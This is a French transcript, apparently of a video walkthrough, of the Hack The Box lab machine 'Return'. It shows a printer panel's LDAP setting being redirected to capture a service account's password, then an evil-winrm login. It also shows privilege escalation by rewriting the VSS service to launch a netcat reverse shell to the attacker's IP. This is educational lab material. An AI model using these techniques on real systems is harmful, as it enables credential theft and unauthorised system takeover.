Aujourd'hui, on va hacker la machine Return qui est une machine Windows, difficulté Easy sur Hack the Box. Donc première chose que je vais faire, c'est un Nmap. Je vais scanner la totalité des ports de la machine qui se trouve en 10.129.141.158 et je vais quand même vérifier 129, 141, 158. Voilà. Je vais mettre tout ça dans un fichier nmap.result et voilà le résultat qui nous a pris quand même 22 secondes. Donc on découvre qu'il y a beaucoup de ports d'ouverts, donc ça on s'y attendait, sur une machine Windows il y a toujours beaucoup de ports d'ouverts. C'est pour ça également que j'ai pas mis les options "-c", "-v", parce que vu le nombre de ports qu'il y avait, ça aurait pris très longtemps de tout scanner. Ces ports-là vont nous suffire en fait, on n'a pas besoin d'obtenir plus d'informations dessus. Là on a déjà pas mal d'informations intéressantes, on voit qu'il y a un serveur LDAP, et ici on a le LDAP de Windows. On a les ports qui sont utilisés par un Active Directory Windows. Donc ça c'est intéressant, ça veut dire qu'on sait déjà qu'on est sur une machine Windows et qu'il y a un Active Directory sur la machine. Le 53 aussi nous montre qu'il y a un Active Directory. Enfin on a le port 80 d'ouvert, donc on a un site web qu'on va aller visiter tout de suite. Si on va sur le site web, on obtient la page d'administration d'une imprimante. Juste avant de regarder le site web, au départ, je m'étais lancé dans un tas de scripts pour énumérer la machine, notamment le script enum for Linux. Mais en fait, il n'y a pas besoin de faire beaucoup d'énumération, parce que sur le site, quand on va dans Settings, ici, on a déjà toutes les informations qu'il nous faut. Donc en réalité, cette machine est bien plus simple qu'on ne pourrait le croire. Il suffit vraiment de regarder ce qu'on a directement sous les yeux. Ça suffit pour résoudre la machine. Donc là, on a déjà un username qui est svc-printer. On a déjà le nom de domaine, return.local, et également le nom de la machine qui s'appelle printer. Donc là, on a déjà pas mal d'informations. On voit que il se connecte au port 389, donc ça c'est le port LDAP. Et on voit ici qu'il y a un mot de passe, mais il est caché sur l'interface web. Ce qu'on va faire, parce qu'on voit qu'on peut updater, c'est qu'on va mettre ici notre adresse à nous. Donc moi je suis en 10.10.14.39. Je vais mettre l'adresse de ma machine Kali. Et je vais lancer un netcat qui va écouter sur le port 389. Donc ce fameux port LDAP. Ensuite j'update. Et là, j'ai oublié de lancer le netcat, donc je vais le lancer et je vais refaire l'update en rentrant mon IP 10.10.14.39. Et quand je fais l'update ici sur mon netcat, j'ai reçu. En fait, ce qui se passe, c'est que là, ce panneau-là, ce site web essaye de se connecter à notre LDAP. Donc, on lui dit que le LDAP est sur notre machine Kali. Sauf qu'en fait, il n'y a pas un LDAP, il y a juste un netcat. Mais lui, comme il essaye de se connecter sur le LDAP, il envoie son username et son password pour tenter de se connecter. Donc ici, on a bien l'username, return anti/svc-printer. Donc l'username c'est svc-printer. Et ici, on a le mot de passe qui est là. ledfg43012, point d'exclamation. Donc on va faire un CTRL-C. Maintenant qu'on a obtenu le mot de passe, on va tenter de se connecter. Parce que si on regarde, hop, je vais réouvrir le résultat d'Nmap. Si on regarde dans le résultat d'Nmap, on voit qu'il y a le port 47001 qui est ouvert, WinRM. Donc WinRM, c'est pour contrôler en fait un serveur Windows à distance. C'est un serveur RDP, donc Remote Desktop Protocol, qui permet de contrôler l'ordinateur à distance. L'idée c'est qu'on va utiliser un script qui s'appelle evilwinrm. On va aller le chercher sur GitHub. Ce evilwinrm, donc il est juste ici. On voit que c'est un shell qui sert en fait à se connecter en Windows Remote Management, donc se connecter en RDP sur les machines Windows pour pouvoir faire des tests dessus et surtout pour pouvoir contrôler la machine. On va aller donc là tout en bas, on voit installation Quick Start et on peut l'installer avec cette commande. Donc j'aime parce que c'est GEM, là j'aime, c'est parce qu'on est sur un programme qui est développé en Ruby et on veut installer donc evilwinrm. Donc on va lancer pour l'installer. Là on a
un problème de permission. S'il nous dit qu'on n'a pas les permissions, on va tout simplement lancer en sudo et ça devrait résoudre le problème. Voilà, il télécharge tout ce qu'il a besoin et il installe tout. Donc maintenant, on va pouvoir utiliser evil-winram et ici on a un exemple de comment l'utiliser. Donc on voit il faut faire -i suivi de l'adresse IP de la cible, -u pour l'utilisateur, -p pour le password, et la suite le -s et le -e, on n'en aura pas besoin. Donc -i 10.129.141.158, -u svc-printer, et le -p. Donc entre single quote, on va récupérer le password qui était ici. Voilà, tac. Et juste comme ça, on devrait pouvoir se connecter. Et là, on est connecté, on peut faire un who am I, et on voit qu'on est connecté en tant que svc-printer. Donc là on est dans Documents, si je fais un dir on voit qu'il n'y a rien dans le dossier. Par contre je peux aller dans le dossier Desktop, faire un dir, et là je peux afficher le contenu d'user.txt. Et ici j'ai le flag de l'utilisateur. Donc c'est tout pour l'utilisateur, maintenant il va falloir réussir à monter en privilège. Encore une fois, j'ai fait pas mal d'énumérations, je suis passé par pas mal de scripts et pas mal de recherches avant de trouver en fait quelque chose de tout évident, c'est que si on regarde les groupes de notre utilisateur, donc via la commande netuser suivi du nom de notre utilisateur, svc-printer, à ce moment-là, on voit que notre utilisateur fait partie de plusieurs groupes et notamment du groupe Server Operators. Quand on recherche sur Google Windows Server Operators, on obtient la doc de Microsoft. Dans la doc de Microsoft, on peut faire une recherche de Server Operators. Ok, ici, dans ce tableau, on a donc notre serveur Operators qui est ici. Et là, on a donc les versions sur lesquelles ils sont, enfin les versions de Windows Server sur lesquelles ce groupe existe. Et si on clique sur le nom du groupe, on a plus d'informations sur ce qu'il peut faire. Donc de base, il n'a pas de membres. On peut rajouter par contre des membres dedans. Et il peut se connecter au serveur, démarrer et stopper des services, faire le backup de certains fichiers, etc., etc. Donc on voit qu'il a pas mal de pouvoir. Donc là, ce qu'on va faire, c'est qu'on va faire Server Operators, Windows Server Operators, Privileges Escalation. Alors, il faut savoir que j'ai lu la page de Actrix et c'est vraiment pas intéressant. Par contre, lui, son site à lui, il est très intéressant. Cube 0x0. Lui, il nous donne des choses très intéressantes. Là, sur le serveur Operators, il va nous montrer comment faire pour exploiter cette faille via en fait le démarrage et la modification d'un service. Là, il nous montre comment modifier un service pour obtenir un reverse shell. Donc première chose qu'on va faire, c'est qu'on va faire Windows netcat ou Windows NC. L'idée c'est de télécharger un fichier netcat, de télécharger netcat mais pour Windows. Celui-là on va pas le prendre parce que si on lit là la description, il nous dit que ça a été compilé mais sans l'option "-e". Et l'option "-e", elle nous permet de préciser le shell. Donc ça nous intéresse pas, on a besoin de cette option "-e". Là si on va sur Master, on peut retourner là sur netcat.exe. Et ici on a le netcat64.exe. Donc sur int 0x33. nc64.exe, on va le télécharger. Save file. Ok. Là je vais ouvrir un nouveau terminal. Je vais déplacer le netcat64 que je viens de télécharger dans le dossier de la machine que je suis en train de faire, donc retourne. Et je vais me déplacer également dans cette machine. Et là, si on regarde ici, j'ai mon netcat qui est présent. Donc, je vais ouvrir un serveur web, http.serveur. Et du côté de mon Windows, je vais faire un wget de http:// l'adresse IP de ma machine, 10.10.14.39, 2.8000 /nc64
.exe. La seule différence qu'il y a entre le wget de Windows et le wget de Linux, c'est que le wget de Windows a besoin d'une option qui est -out file. Donc on doit lui préciser le nom que prendra le fichier une fois qu'il sera téléchargé. Et on va juste l'appeler nc.exe. Ou c'est peut-être -out. -out, ok, donc c'est ça, c'est -out. Et là, on a bien notre netcat.exe qui est ici. Revenons à notre documentation. Ah, ici, il fait une recherche des services sur lesquels il a des droits, et ici, il cherche les services qui ont un privilège système, histoire d'avoir une bonne montée en privilège. Le truc, c'est que j'ai essayé de faire ces commandes, mais elles fonctionnaient pas. Par contre, juste en dessous, on voit qu'il utilise sc.exe, donc ça va être pour modifier justement les services. Ensuite config, donc il veut configurer le service qui s'appelle VSS. Et ce service VSS, il définit un pass vers l'exécutable du service. Et là, lui envoie, il donne un cmd.exe. Nous, on va faire presque ça, parce que on va reprendre ce sc.exe config VSS, et le bin pass, on va donner égal à notre netcat. Donc, sc.exe pour modifier un service. Ensuite, on veut le configurer. Ce service s'appelle VSS. Et on veut modifier le bin pass, donc le binary du service. Ce bin pass, ça sera ce chemin-là, c2.users svc printer desktop, là où on est actuellement, /nc.exe. C'est le binaire qu'on veut exécuter. Ensuite, il nous faut l'option -e cmd.exe pour préciser quelle chaîne on va donner via netcat, l'adresse sur laquelle on veut que netcat se connecte, donc 10.10.14.39, et le port 4444. On va faire ça. Il nous dit que le service a été configuré avec succès. Sur notre machine Kali Linux, on va démarrer un netcat en écoute. Donc là, il est en écoute. Et maintenant, on va pouvoir... Donc là, il stoppe le service VSS, puis ensuite il le start. Donc on va faire pareil, on va faire un sc.exe, stop VSS, on arrête ce service VSS. On voit que le service n'était même pas starté, donc on va le démarrer, nous par contre. On va le start. Et vu que ce service, on l'a modifié pour qu'il soit égal à cette commande-là, donc à notre netcat, on va recevoir une connexion du côté de notre Kali. Donc là, ça cherche, et ici, on a bien notre connexion, et si on regarde, on est NT Authority System. Maintenant, on va se déplacer dans c:/users pour aller chercher le flag de l'administrateur, du root. On se déplace dans Administrator, puis on va aller dans Desktop. Et le flag se trouve juste ici. Donc on peut afficher avec un type root.txt. Et là, petit plantage, on n'a plus rien. En fait, on voit de ce côté-là, du côté de notre Windows, on voit que le service a mis trop de temps à répondre, et donc il a annulé, si vous voulez, Windows a arrêté d'essayer de le démarrer. Et donc de ce côté, sur notre Kali, on a perdu notre shell. Donc c'est pas grave, on va recommencer. On va restart ce fameux service. On obtient notre shell. Et on va se déplacer directement dans le chemin complet, maintenant qu'on sait où il est. Et un type de root.txt. Et là, on a le flag. Donc, c'est tout pour cette machine. Comme vous avez pu le voir, elle est vraiment très facile. J'espère que vous aurez appris quelque chose. Je vous souhaite un bon hacking et vous dis à la prochaine.